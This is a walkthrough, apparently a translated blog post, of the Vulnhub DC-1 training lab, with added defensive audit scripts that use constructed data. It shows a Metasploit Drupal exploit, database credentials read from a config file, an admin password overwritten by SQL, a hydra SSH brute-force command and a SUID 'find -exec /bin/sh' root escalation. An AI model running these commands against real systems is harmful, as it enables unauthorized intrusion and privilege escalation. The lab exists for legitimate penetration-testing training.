
Vulnhub DC-1

Popularity: 65   Published: 2023-12-05 18:51:57.0

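First, be aware of the Cybersecurity Law of the People's Republic of China.

Next, we start on the Vulnhub DC series of target machines.

DESCRIPTION (DC-1 description):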
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn. To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS. There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners. There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges. Depending on your skill level, you may be able to skip finding most of these flags and go straight for root. Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

TECHNICAL INFORMATION
DC-1 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs. While I haven't tested it within a VMware environment, it should also work. It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP. Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause. In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
This is the first vulnerable lab challenge that I've created, so feel free to let me know what you think of it. I can be contacted via Twitter - @DCAU7

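Goal: five flags

Scan the class C network segment and find the extra host, the DC-1 target (the walkthrough was completed over several sessions, so the IP here differs slightly from the IP used later)

Scan the services open on the target; port 80 is found, serving the default page

The Apache and Drupal version numbers are visible

Looking at the page: a login form

Username/password brute force

SQL injection

Check whether the CMS has vulnerabilities

Drupal version 7

The Drupal information appears at the bottom left; information gathering: Drupal is an open-source content management system (CMS) platform

Open msf and search for Drupal-related vulnerabilities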

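set RHOSTS [IP address to scan]

Set the IP to attack

View the settings, interfaces and other information

The IP (RHOST) is now configured

Simply execute run / exploit

This drops straight into a shell

Now check which user I am currently operating as

Check the current working directory path

List the files and subdirectories in the current working directory; flag1 is visible

Every good CMS needs a config file - and so do you.

Gather information online

Look at the sensitive files under sites; permissions are insufficient, so privilege escalation is needed

Typing python does not report "not found", so a Python environment exists

Use Python's pty module to turn the received reverse shell into an interactive shell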

python -c 'import pty;pty.spawn("/bin/bash")'

Obtain administrator privileges

View the file

Here you can see flag2

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
......

The MySQL database username and password are visible; log in to the database

mysql -u<username> -p<password>

mysql -udbuser -pR0ck3t

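The values that follow -u and -p (the placeholders above) must not be preceded by a space

Note that database statements end with a semicolon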

+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

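
Back in msf, run searchsploit drupal to search for vulnerabilities

An exploit script could be used directly here to manipulate the password; we use a different method and replace the password instead

Use Drupal's own password hashing script to hash 123 and obtain the hash value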

update users set pass="$S$DH7Q/w9i1uB40JATOYyS41bhSY5jiuIB8eZ.NkWFxox9AK97jqIJ" where uid=1;

Reset the password by replacing it

Log in

Open the Dashboard and see flag3

Click into it to see the relevant information

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

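Putting this together, we need to get the password from shadow

1. /etc/passwd file format

        This file stores the operating system's user information and is readable by all users

username : password : uid : gid : user description : home directory : login shell


2. /etc/shadow file format

        The records in /etc/shadow correspond one-to-one with those in /etc/passwd; the file is generated automatically by the pwconv command from the data in /etc/passwd.

username: passwd: lastchg: min: max: warn: inactive: expire: flag 

login name : encrypted password : time of last change : minimum interval : maximum interval : warning time : inactivity time : expiry time : flag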
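
The two record formats above, parsed and joined on the login name as an account audit. This is an added example, not part of the original write-up; the sample records, the finding labels and the helper names audit_accounts and make_sample are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: join passwd-format and shadow-format records on the login
# name and report accounts worth reviewing. All sample records are constructed.

audit_accounts() {
    # $1 = passwd-format file (7 fields), $2 = shadow-format file (9 fields)
    awk -F: '
        NR == FNR { hash[$1] = $2; next }           # first file read: shadow
        {
            user = $1; uid = $3 + 0; shell = $7
            login = (shell !~ /(nologin|false)$/)   # can this account get a shell?
            if (uid == 0 && user != "root") print "uid0-duplicate " user
            if (!(user in hash))                print "no-shadow-entry " user
            else if (hash[user] == "" && login) print "empty-password " user
            else if (login && uid >= 1000 && hash[user] !~ /^[!*]/)
                print "interactive-login " user
        }
    ' "$2" "$1"
}

make_sample() {   # $1 = directory that receives constructed passwd and shadow files
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:104:109:MySQL Server:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4:/home/flag4:/bin/bash
toor:x:0:0:second admin:/root:/bin/bash
guest:x:1002:1002::/home/guest:/bin/sh
EOF
    cat > "$1/shadow" <<'EOF'
root:$6$SALT$CONSTRUCTEDHASH:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
mysql:!:19000:0:99999:7:::
flag4:$6$SALT$CONSTRUCTEDHASH:19000:0:99999:7:::
guest::19000:0:99999:7:::
EOF
}

dir=$(mktemp -d)
make_sample "$dir"
audit_accounts "$dir/passwd" "$dir/shadow"
rm -rf "$dir"
```

Against real files the shadow argument needs root to read, which is the same restriction the walkthrough runs into next.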

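Look at the /etc directory: two sensitive files

View the passwd file and find flag4

We now know the username but not the password; try to view the shadow file: access is denied and, as expected, it cannot be opened

Brute-force tools: msf, hydra, john, medusa, wfuzz, bp, dirb

hydra -h shows the usage

Usage syntax:

/usr/share/wordlists/ holds the bundled password wordlist files

We use the commonly used wordlist that ships with Kali, /usr/share/john/password.lst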

options:

-l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE

-p PASS  or -P FILE  try password PASS, or load several passwords from FILE

-v / -V / -d  verbose mode / show login+pass for each attempt / debug mode

-f / -F         exit when a login/pass pair is found (-M: -f per host, -F global)

hydra -l flag4 -P /usr/share/john/password.lst 192.168.37.130 ssh -V -f

The brute force yields the password

Logging in on the web page fails

Back on the target machine, the login succeeds
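
Seen from the target's side, the guessing run above leaves a burst of failed sshd logins followed by a success from the same address. The sketch below is an added example (not from the original write-up) that flags that pattern; the log lines, host name, source addresses and function names are constructed.

```sh
#!/bin/sh
# Added example: flag SSH password guessing in an sshd auth log, including a
# successful login that follows a burst of failures from the same address.

detect_ssh_guessing() {
    # $1 = auth log file, $2 = failed-attempt threshold per source address
    awk -v limit="$2" '
        function after(word,   i) {     # field that follows the LAST "word"
            for (i = NF - 1; i >= 1; i--) if ($i == word) return $(i + 1)
            return ""
        }
        /sshd\[[0-9]+\]: Failed password for / { fails[after("from")]++; next }
        /sshd\[[0-9]+\]: Accepted password for / {
            ip = after("from")
            if (fails[ip] >= limit)
                print "SUCCESS-AFTER-FAILURES " ip " user=" after("for") " failures=" fails[ip]
        }
        END {
            for (ip in fails)
                if (fails[ip] >= limit) print "GUESSING " ip " failures=" fails[ip]
        }
    ' "$1" | LC_ALL=C sort
}

make_sample_log() {   # prints constructed sshd log lines
    i=0
    while [ "$i" -lt 6 ]; do
        echo "Dec  5 18:40:0$i dc-1 sshd[210$i]: Failed password for flag4 from 192.0.2.10 port 5001$i ssh2"
        i=$((i + 1))
    done
    echo "Dec  5 18:40:07 dc-1 sshd[2107]: Accepted password for flag4 from 192.0.2.10 port 50017 ssh2"
    echo "Dec  5 18:41:10 dc-1 sshd[2110]: Failed password for invalid user admin from 192.0.2.77 port 40100 ssh2"
    echo "Dec  5 19:02:33 dc-1 sshd[2140]: Accepted password for flag4 from 192.0.2.50 port 40222 ssh2"
}

log=$(mktemp)
make_sample_log > "$log"
detect_ssh_guessing "$log" 5
rm -f "$log"
```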

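
A txt file is found; reading it tells us that we need to use the same approach to get another flag under root

root should be a file; try to view it: access denied

Privilege escalation is needed

Common privilege escalation methods: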

sudo -l

Check for kernel vulnerabilities

Add a user

find

history

ls -a

Recall that the earlier hint has not been fully used:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

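The hint clearly points at find and -exec, i.e. SUID privilege escalation: a program with the SUID bit inherits root's privileges, so for as long as we are running it we hold root privileges

List the commands on the current system that have the SUID bit set: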

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

The find command appears in the list
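
The same search doubles as a defensive audit: list every SUID file and compare it with the set that is expected to carry the bit, so that a SUID find stands out. This is an added example, not part of the original write-up; the file tree, allowlist and function names are constructed, and on a real system you would scan / and add -user root as in the commands above.

```sh
#!/bin/sh
# Added example: inventory SUID files under a tree and compare them with an
# allowlist of binaries that are expected to carry the bit.

suid_audit() {
    # $1 = root of the tree to scan
    # $2 = allowlist file, one path per line, written relative to $1
    find "$1" -xdev -type f -perm -4000 2>/dev/null | LC_ALL=C sort |
    while IFS= read -r path; do
        rel=${path#"$1"}
        if grep -Fxq -- "$rel" "$2"; then
            echo "expected   $rel"
        else
            echo "UNEXPECTED $rel"    # review it; clear the bit with chmod u-s
        fi
    done
}

make_suid_sample() {   # $1 = empty directory; builds a constructed mini file tree
    mkdir -p "$1/bin" "$1/usr/bin"
    for f in bin/su usr/bin/passwd usr/bin/find usr/bin/ls; do
        : > "$1/$f"
    done
    # The sample files belong to the current user, so no -user root filter here.
    chmod 4755 "$1/bin/su" "$1/usr/bin/passwd" "$1/usr/bin/find"
    chmod 0755 "$1/usr/bin/ls"
    printf '%s\n' /bin/su /usr/bin/passwd > "$1/allowlist"
}

tree=$(mktemp -d)
make_suid_sample "$tree"
suid_audit "$tree" "$tree/allowlist"
rm -rf "$tree"
```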


Privilege escalation

 find -exec "/bin/sh" \;

Root privileges obtained

OK, all done